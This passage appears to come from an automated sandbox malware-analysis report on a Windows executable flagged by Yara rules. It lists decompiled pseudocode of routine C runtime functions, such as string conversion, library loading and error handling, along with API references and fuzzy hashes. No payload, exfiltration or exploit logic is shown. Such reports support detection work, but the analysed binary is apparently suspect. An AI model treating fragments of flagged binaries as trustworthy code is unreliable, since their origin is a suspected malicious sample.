                • Source File: 00000011.00000002.322659318.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                Yara matches
                Similarity
                • API ID: AddressFreeHandleLibraryModuleProc
                • String ID: CorExitProcess$mscoree.dll
                • API String ID: 4061214504-1276376045
                • Opcode ID: cf427baca09bca2fe7784295da489c0a85b1d2c95ce850e6db67983e50b5df7d
                • Instruction ID: 2a5f1b52f49e2644cdc997ca28138b4c7ff7fe3d24fc8903f8dd75b8825c5772
                • Opcode Fuzzy Hash: cf427baca09bca2fe7784295da489c0a85b1d2c95ce850e6db67983e50b5df7d
                • Instruction Fuzzy Hash: D7F0A431A0020CFBDB109FA1DD49B9EBFB9EB04711F00427AF805B22A0DB754A40CA98
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004078CF, Relevance: 7.7, APIs: 5, Instructions: 216COMMON
                Download Yara Rule
                C-Code - Quality: 50%
                			E004078CF(void* __ecx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, signed int _a28, intOrPtr _a32, intOrPtr _a36) {
				signed int _v8;
				signed int _v12;
				void* _v24;
				signed int _t54;
				void* _t56;
				signed int _t58;
				signed int _t60;
				signed int _t64;
				signed int _t68;
				intOrPtr _t76;
				signed int _t79;
				signed int _t85;
				signed int _t88;
				void* _t93;
				void* _t94;
				intOrPtr _t96;
				signed int _t99;
				intOrPtr _t101;
				signed int _t103;
				signed int _t104;
				signed int _t105;
				void* _t108;

				_push(__ecx);
				_push(__ecx);
				_v8 =  *0x412014 ^ _t104;
				_t101 = _a20;
				if(_t101 > 0) {
					_t76 = E004080DB(_a16, _t101);
					_t108 = _t76 - _t101;
					_t4 = _t76 + 1; // 0x1
					_t101 = _t4;
					if(_t108 >= 0) {
						_t101 = _t76;
					}
				}
				_t96 = _a32;
				if(_t96 == 0) {
					_t96 =  *((intOrPtr*)( *_a4 + 8));
					_a32 = _t96;
				}
				_t54 =  *0x40c0d4(_t96, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t101, 0, 0);
				_v12 = _t54;
				if(_t54 == 0) {
					L38:
					E004018CC();
					return _t54;
				} else {
					_t93 = _t54 + _t54;
					_t83 = _t93 + 8;
					asm("sbb eax, eax");
					if((_t93 + 0x00000008 & _t54) == 0) {
						_t79 = 0;
						__eflags = 0;
						L14:
						if(_t79 == 0) {
							L36:
							_t103 = 0;
							L37:
							E004063D5(_t79);
							_t54 = _t103;
							goto L38;
						}
						_t56 =  *0x40c0d4(_t96, 1, _a16, _t101, _t79, _v12);
						_t119 = _t56;
						if(_t56 == 0) {
							goto L36;
						}
						_t98 = _v12;
						_t58 = E00405989(_t83, _t119, _a8, _a12, _t79, _v12, 0, 0, 0, 0, 0);
						_t103 = _t58;
						if(_t103 == 0) {
							goto L36;
						}
						if((_a12 & 0x00000400) == 0) {
							_t94 = _t103 + _t103;
							_t85 = _t94 + 8;
							__eflags = _t94 - _t85;
							asm("sbb eax, eax");
							__eflags = _t85 & _t58;
							if((_t85 & _t58) == 0) {
								_t99 = 0;
								__eflags = 0;
								L30:
								__eflags = _t99;
								if(__eflags == 0) {
									L35:
									E004063D5(_t99);
									goto L36;
								}
								_t60 = E00405989(_t85, __eflags, _a8, _a12, _t79, _v12, _t99, _t103, 0, 0, 0);
								__eflags = _t60;
								if(_t60 == 0) {
									goto L35;
								}
								_push(0);
								_push(0);
								__eflags = _a28;
								if(_a28 != 0) {
									_push(_a28);
									_push(_a24);
								} else {
									_push(0);
									_push(0);
								}
								_t103 =  *0x40c0d8(_a32, 0, _t99, _t103);
								__eflags = _t103;
								if(_t103 != 0) {
									E004063D5(_t99);
									goto L37;
								} else {
									goto L35;
								}
							}
							_t88 = _t94 + 8;
							__eflags = _t94 - _t88;
							asm("sbb eax, eax");
							_t64 = _t58 & _t88;
							_t85 = _t94 + 8;
							__eflags = _t64 - 0x400;
							if(_t64 > 0x400) {
								__eflags = _t94 - _t85;
								asm("sbb eax, eax");
								_t99 = E00403E3D(_t85, _t64 & _t85);
								_pop(_t85);
								__eflags = _t99;
								if(_t99 == 0) {
									goto L35;
								}
								 *_t99 = 0xdddd;
								L28:
								_t99 = _t99 + 8;
								goto L30;
							}
							__eflags = _t94 - _t85;
							asm("sbb eax, eax");
							E004018E0();
							_t99 = _t105;
							__eflags = _t99;
							if(_t99 == 0) {
								goto L35;
							}
							 *_t99 = 0xcccc;
							goto L28;
						}
						_t68 = _a28;
						if(_t68 == 0) {
							goto L37;
						}
						_t123 = _t103 - _t68;
						if(_t103 > _t68) {
							goto L36;
						}
						_t103 = E00405989(0, _t123, _a8, _a12, _t79, _t98, _a24, _t68, 0, 0, 0);
						if(_t103 != 0) {
							goto L37;
						}
						goto L36;
					}
					asm("sbb eax, eax");
					_t70 = _t54 & _t93 + 0x00000008;
					_t83 = _t93 + 8;
					if((_t54 & _t93 + 0x00000008) > 0x400) {
						__eflags = _t93 - _t83;
						asm("sbb eax, eax");
						_t79 = E00403E3D(_t83, _t70 & _t83);
						_pop(_t83);
						__eflags = _t79;
						if(__eflags == 0) {
							goto L36;
						}
						 *_t79 = 0xdddd;
						L12:
						_t79 = _t79 + 8;
						goto L14;
					}
					asm("sbb eax, eax");
					E004018E0();
					_t79 = _t105;
					if(_t79 == 0) {
						goto L36;
					}
					 *_t79 = 0xcccc;
					goto L12;
				}
			}

























                0x004078d4
                0x004078d5
                0x004078dd
                0x004078e2
                0x004078e8
                0x004078ee
                0x004078f4
                0x004078f7
                0x004078f7
                0x004078fa
                0x004078fc
                0x004078fc
                0x004078fa
                0x004078fe
                0x00407903
                0x0040790a
                0x0040790d
                0x0040790d
                0x00407929
                0x0040792f
                0x00407934
                0x00407ac7
                0x00407ad2
                0x00407ada
                0x0040793a
                0x0040793a
                0x0040793d
                0x00407942
                0x00407946
                0x0040799a
                0x0040799a
                0x0040799c
                0x0040799e
                0x00407abc
                0x00407abc
                0x00407abe
                0x00407abf
                0x00407ac5
                0x00000000
                0x00407ac5
                0x004079af
                0x004079b5
                0x004079b7
                0x00000000
                0x00000000
                0x004079bd
                0x004079cf
                0x004079d4
                0x004079d8
                0x00000000
                0x00000000
                0x004079e5
                0x00407a1f
                0x00407a22
                0x00407a25
                0x00407a27
                0x00407a29
                0x00407a2b
                0x00407a77
                0x00407a77
                0x00407a79
                0x00407a79
                0x00407a7b
                0x00407ab5
                0x00407ab6
                0x00000000
                0x00407abb
                0x00407a8f
                0x00407a94
                0x00407a96
                0x00000000
                0x00000000
                0x00407a9a
                0x00407a9b
                0x00407a9c
                0x00407a9f
                0x00407adb
                0x00407ade
                0x00407aa1
                0x00407aa1
                0x00407aa2
                0x00407aa2
                0x00407aaf
                0x00407ab1
                0x00407ab3
                0x00407ae4
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00407ab3
                0x00407a2d
                0x00407a30
                0x00407a32
                0x00407a34
                0x00407a36
                0x00407a39
                0x00407a3e
                0x00407a59
                0x00407a5b
                0x00407a65
                0x00407a67
                0x00407a68
                0x00407a6a
                0x00000000
                0x00000000
                0x00407a6c
                0x00407a72
                0x00407a72
                0x00000000
                0x00407a72
                0x00407a40
                0x00407a42
                0x00407a46
                0x00407a4b
                0x00407a4d
                0x00407a4f
                0x00000000
                0x00000000
                0x00407a51
                0x00000000
                0x00407a51
                0x004079e7
                0x004079ec
                0x00000000
                0x00000000
                0x004079f2
                0x004079f4
                0x00000000
                0x00000000
                0x00407a10
                0x00407a14
                0x00000000
                0x00000000
                0x00000000
                0x00407a1a
                0x0040794d
                0x0040794f
                0x00407951
                0x00407959
                0x00407978
                0x0040797a
                0x00407984
                0x00407986
                0x00407987
                0x00407989
                0x00000000
                0x00000000
                0x0040798f
                0x00407995
                0x00407995
                0x00000000
                0x00407995
                0x0040795d
                0x00407961
                0x00407966
                0x0040796a
                0x00000000
                0x00000000
                0x00407970
                0x00000000
                0x00407970

                APIs
                Memory Dump Source
                • Source File: 00000011.00000001.305861506.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                Similarity
                • API ID: __freea$__alloca_probe_16
                • String ID:
                • API String ID: 3509577899-0
                • Opcode ID: f3441332840de4a7a0684e3d31edcaa551c2c35b623335f854193b075dd2ee1e
                • Instruction ID: 6b6c65cbb01c1feb5c42b87555946cb45975c344a51f119bfb313b5904e0f739
                • Opcode Fuzzy Hash: f3441332840de4a7a0684e3d31edcaa551c2c35b623335f854193b075dd2ee1e
                • Instruction Fuzzy Hash: BA51D572B04216ABDB259F64CC41EAF77A9DB40760B15463EFC04F62C1DB38ED50CAA9
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004062B8, Relevance: 7.6, APIs: 5, Instructions: 110COMMON
                Download Yara Rule
                C-Code - Quality: 79%
                			E004062B8(void* __edx, void* __eflags, intOrPtr _a4, int _a8, char* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28) {
				signed int _v8;
				int _v12;
				char _v16;
				intOrPtr _v24;
				char _v28;
				void* _v40;
				void* __ebx;
				void* __edi;
				signed int _t34;
				signed int _t40;
				int _t45;
				int _t52;
				void* _t53;
				void* _t55;
				int _t57;
				signed int _t63;
				int _t67;
				short* _t71;
				signed int _t72;
				short* _t73;

				_t34 =  *0x412014; // 0x230c200f
				_v8 = _t34 ^ _t72;
				_push(_t53);
				E00403F2B(_t53,  &_v28, __edx, _a4);
				_t57 = _a24;
				if(_t57 == 0) {
					_t52 =  *(_v24 + 8);
					_t57 = _t52;
					_a24 = _t52;
				}
				_t67 = 0;
				_t40 = MultiByteToWideChar(_t57, 1 + (0 | _a28 != 0x00000000) * 8, _a12, _a16, 0, 0);
				_v12 = _t40;
				if(_t40 == 0) {
					L15:
					if(_v16 != 0) {
						 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
					}
					E004018CC();
					return _t67;
				}
				_t55 = _t40 + _t40;
				_t17 = _t55 + 8; // 0x8
				asm("sbb eax, eax");
				if((_t17 & _t40) == 0) {
					_t71 = 0;
					L11:
					if(_t71 != 0) {
						E00402460(_t67, _t71, _t67, _t55);
						_t45 = MultiByteToWideChar(_a24, 1, _a12, _a16, _t71, _v12);
						if(_t45 != 0) {
							_t67 = GetStringTypeW(_a8, _t71, _t45, _a20);
						}
					}
					L14:
					E004063D5(_t71);
					goto L15;
				}
				_t20 = _t55 + 8; // 0x8
				asm("sbb eax, eax");
				_t47 = _t40 & _t20;
				_t21 = _t55 + 8; // 0x8
				_t63 = _t21;
				if((_t40 & _t20) > 0x400) {
					asm("sbb eax, eax");
					_t71 = E00403E3D(_t63, _t47 & _t63);
					if(_t71 == 0) {
						goto L14;
					}
					 *_t71 = 0xdddd;
					L9:
					_t71 =  &(_t71[4]);
					goto L11;
				}
				asm("sbb eax, eax");
				E004018E0();
				_t71 = _t73;
				if(_t71 == 0) {
					goto L14;
				}
				 *_t71 = 0xcccc;
				goto L9;
			}























                0x004062c0
                0x004062c7
                0x004062ca
                0x004062d3
                0x004062d8
                0x004062dd
                0x004062e2
                0x004062e5
                0x004062e7
                0x004062e7
                0x004062ec
                0x00406305
                0x0040630b
                0x00406310
                0x004063af
                0x004063b3
                0x004063b8
                0x004063b8
                0x004063cc
                0x004063d4
                0x004063d4
                0x00406316
                0x00406319
                0x0040631e
                0x00406322
                0x0040636e
                0x00406370
                0x00406372
                0x00406377
                0x0040638e
                0x00406396
                0x004063a6
                0x004063a6
                0x00406396
                0x004063a8
                0x004063a9
                0x00000000
                0x004063ae
                0x00406324
                0x00406329
                0x0040632b
                0x0040632d
                0x0040632d
                0x00406335
                0x00406352
                0x0040635c
                0x00406361
                0x00000000
                0x00000000
                0x00406363
                0x00406369
                0x00406369
                0x00000000
                0x00406369
                0x00406339
                0x0040633d
                0x00406342
                0x00406346
                0x00000000
                0x00000000
                0x00406348
                0x00000000

                APIs
                • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000100,?,00000000,?,?,00000000), ref: 00406305
                • __alloca_probe_16.LIBCMT ref: 0040633D
                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0040638E
                • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 004063A0
                • __freea.LIBCMT ref: 004063A9
                  • Part of subcall function 00403E3D: HeapAlloc.KERNEL32(00000000,?,00000004,?,00407C67,?,00000000,?,004067DA,?,00000004,?,?,?,?,00403B03), ref: 00403E6F
                Memory Dump Source
                • Source File: 00000011.00000002.322659318.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                Yara matches
                Similarity
                • API ID: ByteCharMultiWide$AllocHeapStringType__alloca_probe_16__freea
                • String ID:
                • API String ID: 1857427562-0
                • Opcode ID: ec30a5341e526c775fee802de3ab7847f5c8424ca2981861d1408554259e06d7
                • Instruction ID: a1348b344bfdb8beedea85c2379656fd8e164ea4191dcb9080565a587d22e55f
                • Opcode Fuzzy Hash: ec30a5341e526c775fee802de3ab7847f5c8424ca2981861d1408554259e06d7
                • Instruction Fuzzy Hash: AE31B072A0020AABDF249F65DC85DAF7BA5EF40310B05423EFC05E6290E739CD65DB94
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00409BDD, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00409BDD(void* __eflags, signed int _a4) {
				intOrPtr _t13;
				void* _t21;
				signed int _t33;
				long _t35;

				_t33 = _a4;
				if(E00405D6E(_t33) != 0xffffffff) {
					_t13 =  *0x4130a0; // 0x4e7928
					if(_t33 != 1 || ( *(_t13 + 0x88) & 0x00000001) == 0) {
						if(_t33 != 2 || ( *(_t13 + 0x58) & 0x00000001) == 0) {
							goto L7;
						} else {
							goto L6;
						}
					} else {
						L6:
						_t21 = E00405D6E(2);
						if(E00405D6E(1) == _t21) {
							goto L1;
						}
						L7:
						if(CloseHandle(E00405D6E(_t33)) != 0) {
							goto L1;
						}
						_t35 = GetLastError();
						L9:
						E00405CDD(_t33);
						 *((char*)( *((intOrPtr*)(0x4130a0 + (_t33 >> 6) * 4)) + 0x28 + (_t33 & 0x0000003f) * 0x30)) = 0;
						if(_t35 == 0) {
							return 0;
						}
						return E004047FB(_t35) | 0xffffffff;
					}
				}
				L1:
				_t35 = 0;
				goto L9;
			}







                0x00409be4
                0x00409bf1
                0x00409bf7
                0x00409bff
                0x00409c0d
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00409c15
                0x00409c15
                0x00409c17
                0x00409c29
                0x00000000
                0x00000000
                0x00409c2b
                0x00409c3b
                0x00000000
                0x00000000
                0x00409c43
                0x00409c45
                0x00409c46
                0x00409c5e
                0x00409c65
                0x00000000
                0x00409c73
                0x00000000
                0x00409c6e
                0x00409bff
                0x00409bf3
                0x00409bf3
                0x00000000

                APIs
                • CloseHandle.KERNEL32(00000000,00000000,?,?,00409AFB,?), ref: 00409C33
                • GetLastError.KERNEL32(?,00409AFB,?), ref: 00409C3D
                • __dosmaperr.LIBCMT ref: 00409C68
                Strings
                Memory Dump Source
                • Source File: 00000011.00000002.322659318.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                Yara matches
                Similarity
                • API ID: CloseErrorHandleLast__dosmaperr
                • String ID: (yN
                • API String ID: 2583163307-2793824354
                • Opcode ID: f0f4e4d222caa73ee9a0f3d5fe9adb322dbc8770ca6fb4bd57fc01b4641c9a56
                • Instruction ID: 87f0d20415a4ba4edce453f192d75aa6f60acf784ef8f37888f2bef7d94c0d71
                • Opcode Fuzzy Hash: f0f4e4d222caa73ee9a0f3d5fe9adb322dbc8770ca6fb4bd57fc01b4641c9a56
                • Instruction Fuzzy Hash: 12014832A0815056E2242735A989B6F77C9DB82B34F28013FF809B72C3DE389C82919C
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00405751, Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMON
                Download Yara Rule
                C-Code - Quality: 95%
                			E00405751(signed int _a4) {
				signed int _t9;
				void* _t13;
				signed int _t15;
				WCHAR* _t22;
				signed int _t24;
				signed int* _t25;
				void* _t27;

				_t9 = _a4;
				_t25 = 0x412fc8 + _t9 * 4;
				_t24 =  *_t25;
				if(_t24 == 0) {
					_t22 =  *(0x40cd48 + _t9 * 4);
					_t27 = LoadLibraryExW(_t22, 0, 0x800);
					if(_t27 != 0) {
						L8:
						 *_t25 = _t27;
						if( *_t25 != 0) {
							FreeLibrary(_t27);
						}
						_t13 = _t27;
						L11:
						return _t13;
					}
					_t15 = GetLastError();
					if(_t15 != 0x57) {
						_t27 = 0;
					} else {
						_t15 = LoadLibraryExW(_t22, _t27, _t27);
						_t27 = _t15;
					}
					if(_t27 != 0) {
						goto L8;
					} else {
						 *_t25 = _t15 | 0xffffffff;
						_t13 = 0;
						goto L11;
					}
				}
				_t4 = _t24 + 1; // 0x230c2010
				asm("sbb eax, eax");
				return  ~_t4 & _t24;
			}










                0x00405756
                0x0040575a
                0x00405761
                0x00405765
                0x00405773
                0x00405789
                0x0040578d
                0x004057b6
                0x004057b8
                0x004057bc
                0x004057bf
                0x004057bf
                0x004057c5
                0x004057c7
                0x00000000
                0x004057c8
                0x0040578f
                0x00405798
                0x004057a7
                0x0040579a
                0x0040579d
                0x004057a3
                0x004057a3
                0x004057ab
                0x00000000
                0x004057ad
                0x004057b0
                0x004057b2
                0x00000000
                0x004057b2
                0x004057ab
                0x00405767
                0x0040576c
                0x00000000

                APIs
                • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,004056F8,00000000,00000000,00000000,00000000,?,004058F5,00000006,FlsSetValue), ref: 00405783
                • GetLastError.KERNEL32(?,004056F8,00000000,00000000,00000000,00000000,?,004058F5,00000006,FlsSetValue,0040D200,0040D208,00000000,00000364,?,004043F2), ref: 0040578F
                • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,004056F8,00000000,00000000,00000000,00000000,?,004058F5,00000006,FlsSetValue,0040D200,0040D208,00000000), ref: 0040579D
                Memory Dump Source
                • Source File: 00000011.00000002.322659318.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                Yara matches
                Similarity
                • API ID: LibraryLoad$ErrorLast
                • String ID:
                • API String ID: 3177248105-0
                • Opcode ID: 179fc24cb71fa7b74b78db1aa8efd8080a6824dbe4e2c3e4e777693639d287a7
                • Instruction ID: a071a87d579bf16c10ed97f701b3afe57148fc5a73c01e838bdae708b7fec84a
                • Opcode Fuzzy Hash: 179fc24cb71fa7b74b78db1aa8efd8080a6824dbe4e2c3e4e777693639d287a7
                • Instruction Fuzzy Hash: 2001AC36612622DBD7214BA89D84E577BA8EF45B61F100635FA05F72C0D734D811DEE8
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00404320, Relevance: 6.0, APIs: 4, Instructions: 50COMMON
                Download Yara Rule
                C-Code - Quality: 71%
                			E00404320(void* __ebx, void* __ecx, void* __edx) {
				void* __edi;
				void* __esi;
				intOrPtr _t2;
				void* _t3;
				void* _t4;
				intOrPtr _t9;
				void* _t11;
				void* _t20;
				void* _t21;
				void* _t23;
				void* _t25;
				void* _t27;
				void* _t29;
				void* _t31;
				void* _t32;
				long _t36;
				long _t37;
				void* _t40;

				_t29 = __edx;
				_t23 = __ecx;
				_t20 = __ebx;
				_t36 = GetLastError();
				_t2 =  *0x412064; // 0x7
				_t42 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L2:
					_t3 = E00403ECE(_t23, 1, 0x364);
					_t31 = _t3;
					_pop(_t25);
					if(_t31 != 0) {
						_t4 = E004058CE(_t25, __eflags,  *0x412064, _t31);
						__eflags = _t4;
						if(_t4 != 0) {
							E00404192(_t25, _t31, 0x4132a4);
							E00403E03(0);
							_t40 = _t40 + 0xc;
							__eflags = _t31;
							if(_t31 == 0) {
								goto L9;
							} else {
								goto L8;
							}
						} else {
							_push(_t31);
							goto L4;
						}
					} else {
						_push(_t3);
						L4:
						E00403E03();
						_pop(_t25);
						L9:
						SetLastError(_t36);
						E00403E8B(_t20, _t29, _t31, _t36);
						asm("int3");
						_push(_t20);
						_push(_t36);
						_push(_t31);
						_t37 = GetLastError();
						_t21 = 0;
						_t9 =  *0x412064; // 0x7
						_t45 = _t9 - 0xffffffff;
						if(_t9 == 0xffffffff) {
							L12:
							_t32 = E00403ECE(_t25, 1, 0x364);
							_pop(_t27);
							if(_t32 != 0) {
								_t11 = E004058CE(_t27, __eflags,  *0x412064, _t32);
								__eflags = _t11;
								if(_t11 != 0) {
									E00404192(_t27, _t32, 0x4132a4);
									E00403E03(_t21);
									__eflags = _t32;
									if(_t32 != 0) {
										goto L19;
									} else {
										goto L18;
									}
								} else {
									_push(_t32);
									goto L14;
								}
							} else {
								_push(_t21);
								L14:
								E00403E03();
								L18:
								SetLastError(_t37);
							}
						} else {
							_t32 = E00405878(_t25, _t45, _t9);
							if(_t32 != 0) {
								L19:
								SetLastError(_t37);
								_t21 = _t32;
							} else {
								goto L12;
							}
						}
						return _t21;
					}
				} else {
					_t31 = E00405878(_t23, _t42, _t2);
					if(_t31 != 0) {
						L8:
						SetLastError(_t36);
						return _t31;
					} else {
						goto L2;
					}
				}
			}





















                0x00404320
                0x00404320
                0x00404320
                0x0040432a
                0x0040432c
                0x00404331
                0x00404334
                0x00404342
                0x00404349
                0x0040434e
                0x00404351
                0x00404354
                0x00404366
                0x0040436b
                0x0040436d
                0x00404378
                0x0040437f
                0x00404384
                0x00404387
                0x00404389
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x0040436f
                0x0040436f
                0x00000000
                0x0040436f
                0x00404356
                0x00404356
                0x00404357
                0x00404357
                0x0040435c
                0x00404397
                0x00404398
                0x0040439e
                0x004043a3
                0x004043a6
                0x004043a7
                0x004043a8
                0x004043af
                0x004043b1
                0x004043b3
                0x004043b8
                0x004043bb
                0x004043c9
                0x004043d5
                0x004043d8
                0x004043db
                0x004043ed
                0x004043f2
                0x004043f4
                0x004043ff
                0x00404405
                0x0040440d
                0x0040440f
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x004043f6
                0x004043f6
                0x00000000
                0x004043f6
                0x004043dd
                0x004043dd
                0x004043de
                0x004043de
                0x00404411
                0x00404412
                0x00404412
                0x004043bd
                0x004043c3
                0x004043c7
                0x0040441a
                0x0040441b
                0x00404421
                0x00000000
                0x00000000
                0x00000000
                0x004043c7
                0x00404428
                0x00404428
                0x00404336
                0x0040433c
                0x00404340
                0x0040438b
                0x0040438c
                0x00404396
                0x00000000
                0x00000000
                0x00000000
                0x00404340

                APIs
                • GetLastError.KERNEL32(?,?,004037D2,?,?,004016EA,00000000,?,00410E40), ref: 00404324
                • SetLastError.KERNEL32(00000000,?,?,004016EA,00000000,?,00410E40), ref: 0040438C
                • SetLastError.KERNEL32(00000000,?,?,004016EA,00000000,?,00410E40), ref: 00404398
                • _abort.LIBCMT ref: 0040439E
                Memory Dump Source
                • Source File: 00000011.00000002.322659318.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                Yara matches
                Similarity
                • API ID: ErrorLast$_abort
                • String ID:
                • API String ID: 88804580-0
                • Opcode ID: 227254afb7dcebec3390116ce234b4a72ae62694c4cbaa731daa6ca1d097f5c4
                • Instruction ID: 10f1ed76ee289f7058500775698c1b2aead1ecf844b9f3100802fdeea25ad27f
                • Opcode Fuzzy Hash: 227254afb7dcebec3390116ce234b4a72ae62694c4cbaa731daa6ca1d097f5c4
                • Instruction Fuzzy Hash: 75F0A976204701A6C21237769D0AB6B2A1ACBC1766F25423BFF18B22D1EF3CCD42859D
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004025BA, Relevance: 6.0, APIs: 4, Instructions: 14COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E004025BA() {
				void* _t4;
				void* _t8;

				E00402AE5();
				E00402A79();
				if(E004027D9() != 0) {
					_t4 = E0040278B(_t8, __eflags);
					__eflags = _t4;
					if(_t4 != 0) {
						return 1;
					} else {
						E00402815();
						goto L1;
					}
				} else {
					L1:
					return 0;
				}
			}





                0x004025ba
                0x004025bf
                0x004025cb
                0x004025d0
                0x004025d5
                0x004025d7
                0x004025e2
                0x004025d9
                0x004025d9
                0x00000000
                0x004025d9
                0x004025cd
                0x004025cd
                0x004025cf
                0x004025cf

                APIs
                • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 004025BA
                • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 004025BF
                • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 004025C4
                  • Part of subcall function 004027D9: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 004027EA
                • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 004025D9
                Memory Dump Source
                • Source File: 00000011.00000001.305861506.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                Similarity
                • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                • String ID:
                • API String ID: 1761009282-0
                • Opcode ID: 25f408f13cbe0c40dd9f497db491c4efe3e5092114ef2f2bbff8929357b925fc
                • Instruction ID: 4128bea016199bb2a2d03f508bec19fe8aa18f4adc422371eefe93b2158e2da6
                • Opcode Fuzzy Hash: 25f408f13cbe0c40dd9f497db491c4efe3e5092114ef2f2bbff8929357b925fc
                • Instruction Fuzzy Hash: E0C0024414014264DC6036B32F2E5AA235409A63CDBD458BBA951776C3ADFD044A553E
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00406472, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 114COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00406472(intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _t25;
				intOrPtr* _t26;
				intOrPtr _t28;
				intOrPtr* _t29;
				intOrPtr* _t31;
				intOrPtr* _t45;
				intOrPtr* _t46;
				intOrPtr* _t47;
				intOrPtr* _t55;
				intOrPtr* _t70;
				intOrPtr _t74;

				_t74 = _a4;
				_t25 =  *((intOrPtr*)(_t74 + 0x88));
				if(_t25 != 0 && _t25 != 0x412668) {
					_t45 =  *((intOrPtr*)(_t74 + 0x7c));
					if(_t45 != 0 &&  *_t45 == 0) {
						_t46 =  *((intOrPtr*)(_t74 + 0x84));
						if(_t46 != 0 &&  *_t46 == 0) {
							E00403E03(_t46);
							E00405FEC( *((intOrPtr*)(_t74 + 0x88)));
						}
						_t47 =  *((intOrPtr*)(_t74 + 0x80));
						if(_t47 != 0 &&  *_t47 == 0) {
							E00403E03(_t47);
							E004060EA( *((intOrPtr*)(_t74 + 0x88)));
						}
						E00403E03( *((intOrPtr*)(_t74 + 0x7c)));
						E00403E03( *((intOrPtr*)(_t74 + 0x88)));
					}
				}
				_t26 =  *((intOrPtr*)(_t74 + 0x8c));
				if(_t26 != 0 &&  *_t26 == 0) {
					E00403E03( *((intOrPtr*)(_t74 + 0x90)) - 0xfe);
					E00403E03( *((intOrPtr*)(_t74 + 0x94)) - 0x80);
					E00403E03( *((intOrPtr*)(_t74 + 0x98)) - 0x80);
					E00403E03( *((intOrPtr*)(_t74 + 0x8c)));
				}
				E004065E5( *((intOrPtr*)(_t74 + 0x9c)));
				_t28 = 6;
				_t55 = _t74 + 0xa0;
				_v8 = _t28;
				_t70 = _t74 + 0x28;
				do {
					if( *((intOrPtr*)(_t70 - 8)) != 0x412658) {
						_t31 =  *_t70;
						if(_t31 != 0 &&  *_t31 == 0) {
							E00403E03(_t31);
							E00403E03( *_t55);
						}
						_t28 = _v8;
					}
					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
						_t29 =  *((intOrPtr*)(_t70 - 4));
						if(_t29 != 0 &&  *_t29 == 0) {
							E00403E03(_t29);
						}
						_t28 = _v8;
					}
					_t55 = _t55 + 4;
					_t70 = _t70 + 0x10;
					_t28 = _t28 - 1;
					_v8 = _t28;
				} while (_t28 != 0);
				return E00403E03(_t74);
			}















                0x0040647a
                0x0040647e
                0x00406486
                0x0040648f
                0x00406494
                0x0040649b
                0x004064a3
                0x004064ab
                0x004064b6
                0x004064bc
                0x004064bd
                0x004064c5
                0x004064cd
                0x004064d8
                0x004064de
                0x004064e2
                0x004064ed
                0x004064f3
                0x00406494
                0x004064f4
                0x004064fc
                0x0040650f
                0x00406522
                0x00406530
                0x0040653b
                0x00406540
                0x00406549
                0x00406551
                0x00406552
                0x00406558
                0x0040655b
                0x0040655e
                0x00406565
                0x00406567
                0x0040656b
                0x00406573
                0x0040657a
                0x00406580
                0x00406581
                0x00406581
                0x00406588
                0x0040658a
                0x0040658f
                0x00406597
                0x0040659c
                0x0040659d
                0x0040659d
                0x004065a0
                0x004065a3
                0x004065a6
                0x004065a9
                0x004065a9
                0x004065bb

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000011.00000001.305861506.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                Similarity
                • API ID: ___free_lconv_mon
                • String ID: X&A$h&A
                • API String ID: 3903695350-2460073903
                • Opcode ID: dba504eb91724cc7cfc389edac21456d4d1c599f40ca9baf248d7b7104a13552
                • Instruction ID: c022010335f5f63834756724e632691087aba38665b0d3053e0191f3bc5e7cad
                • Opcode Fuzzy Hash: dba504eb91724cc7cfc389edac21456d4d1c599f40ca9baf248d7b7104a13552
                • Instruction Fuzzy Hash: 78316E31600601AFDB209F39E845B577BE8AF00315F11457FE45AE66D1DF39EEA08B98
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00405575, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 6COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00405575() {

